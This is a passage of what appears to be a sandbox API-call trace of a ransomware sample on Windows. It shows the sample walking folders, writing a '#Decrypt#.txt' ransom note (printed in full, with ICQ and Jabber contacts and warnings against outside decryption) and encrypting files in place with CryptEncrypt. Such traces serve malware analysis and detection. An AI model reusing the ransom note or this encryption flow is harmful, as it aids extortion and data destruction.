(lpString1="..", lpString2=".") returned 1 [0223.927] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0223.927] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 0 [0223.927] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0223.927] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\#Decrypt#.txt") returned 35 [0223.927] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\#Decrypt#.txt" (normalized: "c:\\perflogs\\admin\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0223.929] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0223.929] WriteFile (in: hFile=0x164, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0223.931] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0223.931] WriteFile (in: hFile=0x164, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0223.931] CloseHandle (hObject=0x164) returned 1 [0223.931] GetProcessHeap () returned 0x780000 [0223.931] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0223.931] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Admin", cAlternateFileName="")) returned 0 [0223.931] FindClose (in: hFindFile=0x7c66e0 | out: hFindFile=0x7c66e0) returned 1 [0223.931] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\#Decrypt#.txt") returned 29 [0223.931] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\#Decrypt#.txt" (normalized: "c:\\perflogs\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0223.932] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0223.932] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af578*=0x5e4, lpOverlapped=0x0) returned 1 [0223.940] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0223.940] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af578*=0x558, lpOverlapped=0x0) returned 1 [0223.940] CloseHandle (hObject=0x200) returned 1 [0225.765] GetProcessHeap () returned 0x780000 [0225.765] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b67f0 | out: hHeap=0x780000) returned 1 [0225.765] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xebaa5200, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xebaa5200, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0225.765] lstrcmpiW (lpString1="Program Files", lpString2="Windows") returned -1 [0225.765] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files") returned 20 [0225.766] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0225.766] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0225.766] lstrcmpW (lpString1="\\\\?\\C:\\Program Files", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.766] GetProcessHeap () returned 0x780000 [0225.766] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b67f0 [0225.766] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\*") returned 22 [0225.766] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\*", lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xebaa5200, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xebaa5200, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName=".", cAlternateFileName="")) returned 0x7c66e0 [0225.766] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.766] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\.") returned 22 [0225.766] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.766] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0225.767] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0225.767] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0225.767] lstrlenW (lpString=".testttjffg") returned 11 [0225.767] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\.", lpSrch=".testttjffg") returned 0x0 [0225.767] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0225.767] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0225.767] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\." (normalized: "c:\\program files\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0225.767] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xebaa5200, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xebaa5200, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 1 [0225.768] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0225.768] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\..") returned 23 [0225.768] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.768] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.768] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0225.768] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0225.768] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0225.768] lstrlenW (lpString=".testttjffg") returned 11 [0225.768] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\..", lpSrch=".testttjffg") returned 0x0 [0225.768] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0225.768] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0225.768] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0225.768] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe389e040, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe389e040, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0225.768] lstrcmpiW (lpString1="Common Files", lpString2="Windows") returned -1 [0225.768] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files") returned 33 [0225.768] lstrcmpW (lpString1="Common Files", lpString2=".") returned 1 [0225.768] lstrcmpW (lpString1="Common Files", lpString2="..") returned 1 [0225.768] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.768] GetProcessHeap () returned 0x780000 [0225.769] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0225.769] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\*") returned 35 [0225.769] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe389e040, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe389e040, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0225.769] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.769] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\.") returned 35 [0225.769] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.769] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe389e040, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe389e040, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0225.769] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0225.769] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\..") returned 36 [0225.769] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.769] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.769] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0225.769] lstrcmpiW (lpString1="DESIGNER", lpString2="Windows") returned -1 [0225.769] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER") returned 42 [0225.769] lstrcmpW (lpString1="DESIGNER", lpString2=".") returned 1 [0225.769] lstrcmpW (lpString1="DESIGNER", lpString2="..") returned 1 [0225.769] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.769] GetProcessHeap () returned 0x780000 [0225.769] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0225.770] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*") returned 44 [0225.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0225.770] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.770] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\.") returned 44 [0225.770] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.770] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0225.770] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0225.770] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\..") returned 45 [0225.770] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.770] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.770] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0225.771] lstrcmpiW (lpString1="MSADDNDR.DLL", lpString2="Windows") returned -1 [0225.771] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 55 [0225.771] StrStrIW (lpFirst="MSADDNDR.DLL", lpSrch=".horseleader") returned 0x0 [0225.771] lstrcmpW (lpString1="MSADDNDR.DLL", lpString2="#Decrypt#.txt") returned 1 [0225.771] lstrcmpW (lpString1="MSADDNDR.DLL", lpString2="_uninstalling_.png") returned 1 [0225.771] lstrlenW (lpString=".testttjffg") returned 11 [0225.771] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpSrch=".testttjffg") returned 0x0 [0225.771] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0225.771] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0225.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0225.772] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 55 [0225.772] StrStrW (lpFirst="MSADDNDR.DLL", lpSrch=".txt") returned 0x0 [0225.772] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=99136) returned 1 [0225.772] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.772] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0225.776] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.776] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0225.776] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x99a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.777] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0225.777] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.777] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0225.777] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x13340, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.777] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0225.778] SetFilePointerEx (in: hFile=0x21c, 